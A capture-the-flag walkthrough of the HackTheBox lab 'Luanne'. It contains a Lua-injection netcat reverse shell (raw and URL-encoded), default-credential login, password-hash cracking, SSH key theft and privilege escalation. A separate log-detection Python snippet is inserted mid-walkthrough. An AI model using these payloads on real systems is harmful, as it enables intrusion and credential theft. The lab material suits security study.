Luanne

Name: Luanne
Release Date: 28 Nov 2020
Retire Date: 27 Mar 2021
OS: Linux/Other
Base Points: Easy - Retired [0]
jkr 00 days, 01 hours, 34 mins, 11 seconds
xct 00 days, 01 hours, 50 mins, 24 seconds
Creator: polarbearer
Pentest Workshop PDF: Luanne.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.218

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

The main open ports we need to look into are HTTP on TCP 80 and TCP 9001. Navigating to either one immediately prompts for a username and password, which we don't have....yet. Fortunately, autorecon's XML output shows that port 9001 is running the Medusa Supervisor process manager. A quick DuckDuckGo search (privacy XD) for Medusa default credentials finds this site:

https://developpaper.com/supervisor-process-manager/

which tells us that the default credentials are user:123. Trying those credentials allows us to log in and see the Supervisor panel.

Let's check out what each of these is about, in particular the processes monitor, which appears to be a ps -aux output.

OK, this is interesting. There are 2 processes (PID 318 and 391) listening on localhost:3000 and 3001 respectively. 3000 looks to be running weather.lua (httpd_devel.pid). Time for more searching, but first let's see if there are any additional directories under http://10.10.10.218:3000/weather using:

gobuster dir -k -e -r -u http://10.10.10.218/weather -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,bat,c,cfm,cgi,css,com,dll,exe,git,htm,html,inc,jhtml,js,jsa,jsp,log,mdb,nsf,pcap,php,php2,php3,php4,php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,301,302,307" -t 50 -o Luanne.out

We find a /forecast directory. When we navigate to it, we get a 200 response, but with a little bit more information on how we can use the forecast call.

So, if we add ?city=list to that, the response should give us a list of locations, but the parameter could also be an injection point. Lua httpd handlers that splice a request parameter straight into code are sometimes vulnerable to code execution; for example:

curl -v "http://10.10.10.218/weather/forecast?city=')+os.execute('id')+--"

would be an example of a Lua RCE vector. Let's test it against the forecast endpoint. Note that we have to switch to the RAW DATA tab of the response, but Lua RCE is confirmed! Let's see if we can use that to create a reverse shell using:
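On the defensive side, the same injection shape is visible in the web server's access log. As an added example (not from the writeup), this Python snippet decodes the query string of constructed combined-format log lines and flags values that carry Lua call syntax such as os.execute; the sample lines and the signature list are assumptions, not the box's real logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed combined-format access log lines (not real traffic from the box):
# three legitimate lookups and one request smuggling Lua into the city parameter.
SAMPLE_LOG = """\
10.10.16.4 - - [28/Nov/2020:10:01:02 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 143
10.10.16.4 - - [28/Nov/2020:10:01:09 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 512
10.10.16.4 - - [28/Nov/2020:10:02:44 +0000] "GET /weather/forecast?city=%27%29%2Bos.execute%28%27id%27%29%2B-- HTTP/1.1" 500 88
10.10.16.4 - - [28/Nov/2020:10:03:01 +0000] "GET /weather/forecast?city=S%C3%A3o%20Paulo HTTP/1.1" 200 150
"""

# Request line of a combined-format entry: method, target and status code.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Signatures of Lua being spliced into a string parameter (assumed list, extend as needed):
# dangerous calls, a quote that closes the string followed by ')' and '+' or '..',
# and a trailing '--' that comments out whatever code followed the injection point.
LUA_INJECTION = re.compile(
    r"\b(os\.execute|io\.popen|loadstring|load)\s*\("
    r"|['\"]\s*\)\s*(\+|\.\.)"
    r"|--\s*$"
)


def find_injection_attempts(log_text):
    """Return (path, parameter, decoded value, status) for every suspicious query value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so %27%29%2B becomes ')+ exactly as the server sees it
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if LUA_INJECTION.search(value):
                hits.append((parts.path, name, value, int(m["status"])))
    return hits


if __name__ == "__main__":
    for path, name, value, status in find_injection_attempts(SAMPLE_LOG):
        print(f"{status} {path} {name}={value!r}")
```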

curl -v "http://10.10.10.218/weather/forecast?city=')+os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 1337 >/tmp/f')+--"

Now we have to URL-encode the payload string, so the command ends up being:

curl -v "http://10.10.10.218/weather/forecast?city=%27%29%2Bos.execute%28%27rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.16.4%201337%20%3E%2Ftmp%2Ff%27%29%2B--"

Now we have a shell as the httpd user. We need to move laterally and then escalate privileges. The first thing we can grab is the .htpasswd password hash and crack it with John the Ripper.

$ cat ./.htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash

webapi_user:iamthebest

What's with everyone thinking they're the best? Any who... Now that we have another set of credentials, let's see if we can make any headway with that lateral movement I was talking about. <MANY hours later> I finally found something that works. I never thought to pass the credentials in curl directly from the box and grab directories and file contents.

curl --user webapi_user:iamthebest localhost:3001/~r.michaels/

and then

curl --user webapi_user:iamthebest localhost:3001/~r.michaels/id_rsa

Bingo! SSH key and a good "pause" point if we need to. Copy it into a key file on your attack machine and:

ssh -i id_rsa r.michaels@10.10.10.218

and we have a shell and can grab the user.txt flag.

luanne$ cat user.txt
ea5f0ce6a917b0be1eabc7f9218febc0

On to privesc. One of the first things we find is a backups directory and, more importantly, the backups in that directory. So that no one interrupts what we're doing (or vice versa), let's copy that backup file into a different directory. /tmp will wipe everything after a few minutes, so we need to move fast. From the /home/r.michaels/backups folder, run:

cp ./devel_backup-2020-09-16.tar.gz.enc /tmp/

cd /tmp

netpgp --decrypt --output=devel_backup-2020-09-16.tar.gz devel_backup-2020-09-16.tar.gz.enc

tar xvzf devel_backup-2020-09-16.tar.gz

You'll see it extract another .htpasswd file!  Cat it quickly.

cat /tmp/devel-2020-09-16/www/.htpasswd

Now we can place that into a new hashfile and run it through John like we did the other.

luanne$ cat devel-2020-09-16/www/.htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

The backed-up hash cracks to littlebear.

Now, NetBSD doesn't have "sudo" per se, but uses "doas", which is essentially the same thing. LinEnum/LinPEAS shows that doas allows r.michaels to run commands as root, but it needs the root password.... We do have littlebear. Let's try it.

doas sh

Password: littlebear

#

We win! Grab the proof info and we've completed another box.

# cat /root/root.txt
7a9b5c206e8e8ba09bb99bd113675f66